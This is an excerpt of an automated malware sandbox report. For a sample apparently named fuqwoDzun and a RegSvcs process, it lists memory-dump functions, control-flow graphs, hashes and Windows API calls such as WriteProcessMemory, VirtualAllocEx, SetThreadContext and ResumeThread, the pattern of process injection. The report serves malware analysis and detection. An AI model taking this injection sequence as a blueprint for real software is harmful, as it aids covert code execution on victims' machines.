                                                        control_flow_graph 163 6915140-6915142 164 6915144 163->164 165 691514a-691514d 163->165 166 6915146 164->166 167 6915169-69151d5 ReadProcessMemory 164->167 168 691514e-6915167 165->168 166->168 169 6915148-6915149 166->169 172 69151d7-69151dd 167->172 173 69151de-691520e 167->173 168->167 169->165 172->173
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069151C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 2a7c26fac20a9b8ec7ff94868b054871a6c8066457f0b89149855f1a94a17289
                                                        • Instruction ID: d0b43888291d89aa1fa2e34df71231da40937b9a152d549a44818bd0d84dad20
                                                        • Opcode Fuzzy Hash: 2a7c26fac20a9b8ec7ff94868b054871a6c8066457f0b89149855f1a94a17289
                                                        • Instruction Fuzzy Hash: E8215AB190030D9FDB51CFA9C844BEEBBF5FF88310F658429E928A7650C7749945CBA4
                                                        Function 06915058 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 6915058-69150a6 179 69150b6-69150f5 WriteProcessMemory 177->179 180 69150a8-69150b4 177->180 182 69150f7-69150fd 179->182 183 69150fe-691512e 179->183 180->179 182->183
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 069150E8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 89d50c01e04b39ce8c585ba8b1ca7327f0d0b2bb66fe1b8a3f2c98e1ea2fe3cb
                                                        • Instruction ID: 7ab40c07e5dd9e37997ea422d4ccc923809fc9b4be8a9a524df7d2f378ca2ca1
                                                        • Opcode Fuzzy Hash: 89d50c01e04b39ce8c585ba8b1ca7327f0d0b2bb66fe1b8a3f2c98e1ea2fe3cb
                                                        • Instruction Fuzzy Hash: A82157B19003099FDF50CFAAC884BDEBBF5FF48310F10842AE918A7240C7B89940CBA4
                                                        Function 06914EB9 Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 187 6914eb9-6914eba 188 6914ec2-6914f0b 187->188 189 6914ebc-6914ec1 187->189 192 6914f1b-6914f4b Wow64SetThreadContext 188->192 193 6914f0d-6914f19 188->193 189->188 195 6914f54-6914f84 192->195 196 6914f4d-6914f53 192->196 193->192 196->195
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06914F3E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: d099120fdc38a13686c7d28a94fc5f0182909b402919f36889fa714d2ea9af22
                                                        • Instruction ID: 6f7ccc75153d0abac456db2094207e4362e796fb3efb1a45e5ad304636123840
                                                        • Opcode Fuzzy Hash: d099120fdc38a13686c7d28a94fc5f0182909b402919f36889fa714d2ea9af22
                                                        • Instruction Fuzzy Hash: 24214871D003089FDB50CFAAC4847EEBBF4EB48314F64842AD569AB341C7B89945CBA4
                                                        Function 06914EC0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 200 6914ec0-6914f0b 203 6914f1b-6914f4b Wow64SetThreadContext 200->203 204 6914f0d-6914f19 200->204 206 6914f54-6914f84 203->206 207 6914f4d-6914f53 203->207 204->203 207->206
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06914F3E
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: 8b7d6e11330bfe27dc2b0ba0ae31525d500ebfa89ccc7fb504415632b51d2cb0
                                                        • Instruction ID: 6f6563b135b383efa3133ea341b6f7637e10ab82022a4e98fd11b712f0f7b9c6
                                                        • Opcode Fuzzy Hash: 8b7d6e11330bfe27dc2b0ba0ae31525d500ebfa89ccc7fb504415632b51d2cb0
                                                        • Instruction Fuzzy Hash: D5213771D003088FDB50CFAAC4857AEBBF4EB48314F64842AD569A7341CB789945CBA4
                                                        Function 06915148 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 211 6915148-69151d5 ReadProcessMemory 217 69151d7-69151dd 211->217 218 69151de-691520e 211->218 217->218
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 069151C8
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 2470b2be215dbab4c0aa2dbeb0a2fbb8eda3af0dc6085166ccd588bb6057d090
                                                        • Instruction ID: 30dc6ffd0f2751be30a2a5658d91cb72176b191bda5b75182ff5ad96fd3efcd9
                                                        • Opcode Fuzzy Hash: 2470b2be215dbab4c0aa2dbeb0a2fbb8eda3af0dc6085166ccd588bb6057d090
                                                        • Instruction Fuzzy Hash: 922114B18003499FDB10CFAAC884BEEBBF5FF48310F55842AE959A7240C7799940CBA4
                                                        Function 00A9D180 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 222 a9d180-a9e0e8 224 a9e0ea-a9e0ed 222->224 225 a9e0f0-a9e11f LoadLibraryExW 222->225 224->225 226 a9e128-a9e145 225->226 227 a9e121-a9e127 225->227 227->226
                                                        APIs
                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00A9DF01,00000800,00000000,00000000), ref: 00A9E112
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 30f6ca98c3561a328f63d7dd032808e76d505f28a414469a7e784ce0991e3d66
                                                        • Instruction ID: 330dfaaba1df4d1e5edfc9b25331e0b59c755b75b0fb7995aa9b0cc933a76835
                                                        • Opcode Fuzzy Hash: 30f6ca98c3561a328f63d7dd032808e76d505f28a414469a7e784ce0991e3d66
                                                        • Instruction Fuzzy Hash: B51103B69046499FDB10CF9AC444B9EFBF4EB58310F14842AE919A7201C3B5A945CFA5
                                                        Function 06914F90 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 230 6914f90-6915013 VirtualAllocEx 234 6915015-691501b 230->234 235 691501c-6915041 230->235 234->235
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06915006
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 82ab8a9077682fd65248f722d1c1645f8f5296904df755dc0f77324ca289b35e
                                                        • Instruction ID: fdbfe45c16dd3fe653f6e04ccf4097c476a52fa3ed3ca9c4e219bdcfbf28fe88
                                                        • Opcode Fuzzy Hash: 82ab8a9077682fd65248f722d1c1645f8f5296904df755dc0f77324ca289b35e
                                                        • Instruction Fuzzy Hash: 281167729003489FDF10CFAAC844BDEBFF5EF88310F248419E959A7250C7B59544CBA0
                                                        Function 06914E09 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 239 6914e09-6914e7f ResumeThread 244 6914e81-6914e87 239->244 245 6914e88-6914ead 239->245 244->245
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 42bf91390a0468d6a44f337e8279140e3bdf5c721fd2dcb9ab876ba8c669c61d
                                                        • Instruction ID: de54e88f2fa4a87761e072d075847e856013d3084aac1f1dcf8d6a930cf9efb1
                                                        • Opcode Fuzzy Hash: 42bf91390a0468d6a44f337e8279140e3bdf5c721fd2dcb9ab876ba8c669c61d
                                                        • Instruction Fuzzy Hash: 0F118BB1D043488FDB10DFAAD8447EEFBF5EB48710F248429D519A7240C7B5A940CBA4
                                                        Function 06914F98 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 249 6914f98-6915013 VirtualAllocEx 252 6915015-691501b 249->252 253 691501c-6915041 249->253 252->253
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06915006
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 6c0c2332c4a44fad862d446b4bddcd38c0682bbff523986cc3d91402ec4ac0b2
                                                        • Instruction ID: fdf969d35546f310d1a2f345254830f56ee0dd7ded5f753fb20f290249f84413
                                                        • Opcode Fuzzy Hash: 6c0c2332c4a44fad862d446b4bddcd38c0682bbff523986cc3d91402ec4ac0b2
                                                        • Instruction Fuzzy Hash: E71137719003489FDF10DFAAC844BDEBBF5EF88314F248429E959A7250C7759544CFA4
                                                        Function 06914E10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 257 6914e10-6914e7f ResumeThread 260 6914e81-6914e87 257->260 261 6914e88-6914ead 257->261 260->261
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 3a917f924650f6f7799a535d7a9d41273494d3a84e99bf49aeb662005b5680cb
                                                        • Instruction ID: e987c97ac664fdc4e651938ed274626efd04709cde77562fb19dd29b5c3c1b04
                                                        • Opcode Fuzzy Hash: 3a917f924650f6f7799a535d7a9d41273494d3a84e99bf49aeb662005b5680cb
                                                        • Instruction Fuzzy Hash: 2C113AB1D003488FDB10DFAAD4457EEFBF5EB48724F248429D559A7240C775A944CBA4
                                                        Function 00A9DE20 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00A9DE86
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1511703886.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_a90000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 18dcf0bd867730d8c7abc7950512e8878fecb5636e90bb4c24c504b7558f7628
                                                        • Instruction ID: 5952837d11a1fbcbbc9fb108d9a3d5d09504fedcfe490033687424efa3aa0adc
                                                        • Opcode Fuzzy Hash: 18dcf0bd867730d8c7abc7950512e8878fecb5636e90bb4c24c504b7558f7628
                                                        • Instruction Fuzzy Hash: A0110FB6D006498FDB10CF9AD444BDEFBF4AB88310F10842AD868BB200C375A545CFA1
                                                        Function 06918773 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 069187D5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 161893fc14241d36aede25de394590f3a39bae94702759ca8fd045130e6d8c17
                                                        • Instruction ID: 7b2455726388808bcf050c76fba1e0ad08ef7127ab3dad22d07006c1a1b4a0f3
                                                        • Opcode Fuzzy Hash: 161893fc14241d36aede25de394590f3a39bae94702759ca8fd045130e6d8c17
                                                        • Instruction Fuzzy Hash: 461103B59003489FDB50CF9AC984BDFFBF8EB48310F20841AE958A7600C375A944CFA1
                                                        Function 06916A40 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 069187D5
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1585961605.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_6910000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID: MessagePost
                                                        • String ID:
                                                        • API String ID: 410705778-0
                                                        • Opcode ID: 4ce3ebc27ffe46b3a66ab10d71013568ae5191781308e460ee204ec4ea9a09ab
                                                        • Instruction ID: da682d4cfdf0fd94cae9c2e35eb1691669717939481dd430be7c49d5b0e912ab
                                                        • Opcode Fuzzy Hash: 4ce3ebc27ffe46b3a66ab10d71013568ae5191781308e460ee204ec4ea9a09ab
                                                        • Instruction Fuzzy Hash: 2311F2B590034C9FDB50CF9AC984BEEBBF8EB48310F20841AE958A7600C375A944CFA5
                                                        Function 007BD3D8 Relevance: .1, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1436952666.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7bd000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2b83aa04dd96a26978ec3623d654c99efd7334828a167d797eaf6b532678cf59
                                                        • Instruction ID: 3e56140633b1f1abbd52e5aed85238f9c9eb815e34e09c12f95cf8787fda97ee
                                                        • Opcode Fuzzy Hash: 2b83aa04dd96a26978ec3623d654c99efd7334828a167d797eaf6b532678cf59
                                                        • Instruction Fuzzy Hash: 812125B1504284DFDB24DF50D9C0B66BB65FB98324F20C569EC094B256D33AEC56CBA2
                                                        Function 008AD01C Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1443578892.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_8ad000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2a159bc4c3000caa7a9666f239f65ff2c89b485310fa3ae561e807e7ac7692ea
                                                        • Instruction ID: a16c61b8f48b17f7fa34b1cf9de725b4138b31e7ee580e890dd1a0e758612d7a
                                                        • Opcode Fuzzy Hash: 2a159bc4c3000caa7a9666f239f65ff2c89b485310fa3ae561e807e7ac7692ea
                                                        • Instruction Fuzzy Hash: 2E212571504704DFEB14DF10D980B16BB61FB89314F20C56DD84ACBA52C376D847CA61
                                                        Function 008AD1D4 Relevance: .1, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1443578892.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_8ad000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 16a5287ddd7203ed1daea658257e5477df6cf4473112fe494097a119d7bf354a
                                                        • Instruction ID: a3fd60b5bedec5cd71a0a434fd836221322c4622e167e559467ad3471b6f22e3
                                                        • Opcode Fuzzy Hash: 16a5287ddd7203ed1daea658257e5477df6cf4473112fe494097a119d7bf354a
                                                        • Instruction Fuzzy Hash: A3210771504304DFEB05DF50D5C0B25BB65FB85318F20C56DD84ACBA52C73AE856CA61
                                                        Function 008AD006 Relevance: .1, Instructions: 63COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1443578892.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_8ad000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc6b15988f1022154eb2777936ccc0e99a532323dabb79a3cae3f1006af33c32
                                                        • Instruction ID: 76a5896feee8f0f06b93430d2ed3239ca68d8b2bcf1d744091316568bb02b254
                                                        • Opcode Fuzzy Hash: cc6b15988f1022154eb2777936ccc0e99a532323dabb79a3cae3f1006af33c32
                                                        • Instruction Fuzzy Hash: 1E2180755087809FDB02CF24D994711BF71FB46314F28C5EAD8898F6A7C33A985ACB62
                                                        Function 007BD3D3 Relevance: .1, Instructions: 56COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1436952666.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7bd000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                        • Instruction ID: 8beb3d6c963e71f38203fdebc536a1c84586146eace09ff212098be4411d5241
                                                        • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                        • Instruction Fuzzy Hash: 9611D376504280DFCB15CF10D5C4B56BF72FB94324F24C6A9DC490B656C33AE85ACBA2
                                                        Function 008AD1CF Relevance: .1, Instructions: 53COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1443578892.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_8ad000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction ID: 4ebf7570c30b5ac65b41b8d8a839e5f358734ff76cd611472f5e64f48b383ab8
                                                        • Opcode Fuzzy Hash: 04b342587f02f4df216fd9fa4589941a60fabf0b5787ec5e4e812599987ae7f8
                                                        • Instruction Fuzzy Hash: 1F118B75504280DFDB15CF10D5C4B15BBA2FB85314F24C6A9D84A8BAA6C33AE84ACB61
                                                        Function 007BD745 Relevance: .0, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1436952666.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7bd000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 549f9def56dffe51c14911e347c6f2a55afc5c9341e8356211765757c02830a0
                                                        • Instruction ID: a7dd28464641e2f8ba9229b9a508f3e1fbf79a6dade6efdc187a8af5845fa713
                                                        • Opcode Fuzzy Hash: 549f9def56dffe51c14911e347c6f2a55afc5c9341e8356211765757c02830a0
                                                        • Instruction Fuzzy Hash: 5401D6311083409BE7349F66CD84BE6FBD8DF51364F18C52AED194A286EA7D9C40CAB2
                                                        Function 007BD744 Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.1436952666.00000000007BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 007BD000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7bd000_fuqwoDzun.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 703b9146c46b20cc68908aab41a2c497cc6f05b4085a39d101b556ddf6cb06e8
                                                        • Instruction ID: 3fb4e75c926d17a51bbc643b5d92802c20291803ca280df7ab51c5fbc4993ee6
                                                        • Opcode Fuzzy Hash: 703b9146c46b20cc68908aab41a2c497cc6f05b4085a39d101b556ddf6cb06e8
                                                        • Instruction Fuzzy Hash: 3CF062714043449EE7208E16D884BA6FFD8EB91734F18C45AED484A286D6799C44CAB1

                                                        Execution Graph

                                                        Execution Coverage:0%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:5
                                                        Total number of Limit Nodes:1
                                                        execution_graph 62035 1142b60 LdrInitializeThunk 62039 1142c00 62041 1142c0a 62039->62041 62042 1142c11 62041->62042 62043 1142c1f LdrInitializeThunk 62041->62043

                                                        Executed Functions

                                                        Function 01142C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 1142c0a-1142c0f 1 1142c11-1142c18 0->1 2 1142c1f-1142c26 LdrInitializeThunk 0->2
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(0115FD4F,000000FF,00000024,011F6634,00000004,00000000,?,-00000018,7D810F61,?,?,01118B12,?,?,?,?), ref: 01142C24
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: dba909999f6eedaa3c6d7c0f03c52461cd82fe67309f8eceeab1734e858887a3
                                                        • Instruction ID: 51df5e1f68fe0b5a2ecdb307994e9fb93c240db987ca5410b4ebd93c8612a4fa
                                                        • Opcode Fuzzy Hash: dba909999f6eedaa3c6d7c0f03c52461cd82fe67309f8eceeab1734e858887a3
                                                        • Instruction Fuzzy Hash: 3EB09B719015C5C6DB55E7645708717790077D0701F25C061F2130641F4778C1D1E675
                                                        Function 01142B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 4 1142b60-1142b6c LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(01170DBD,?,?,?,?,01164302), ref: 01142B6A
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_10d0000_RegSvcs.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                        • Instruction ID: 24c54b08d534af1a448593e9c19fc1330cb911b1899edcd7107a9966507bce0f
                                                        • Opcode Fuzzy Hash: a90c2b1da3a24100a86a9835afa027171611ddc174f0a61628c0e0b864a7baf4
                                                        • Instruction Fuzzy Hash: B690026120240043424971598514616400A97E0201B55C021F5115590DC62589916625
                                                        Function 01142DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 6 1142df0-1142dfc LdrInitializeThunk
                                                        APIs
                                                        • LdrInitializeThunk.NTDLL(0117E73E,0000005A,011DD040,00000020,00000000,011DD040,00000080,01164A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0114AE00), ref: 01142DFA
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.1857302997.00000000010F6000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000010D7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001150000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001156000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.0000000001192000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000E.00000002.1857302997.00000000011F3000.00000040.00001000.00020000.00000000.sdmpDownload File
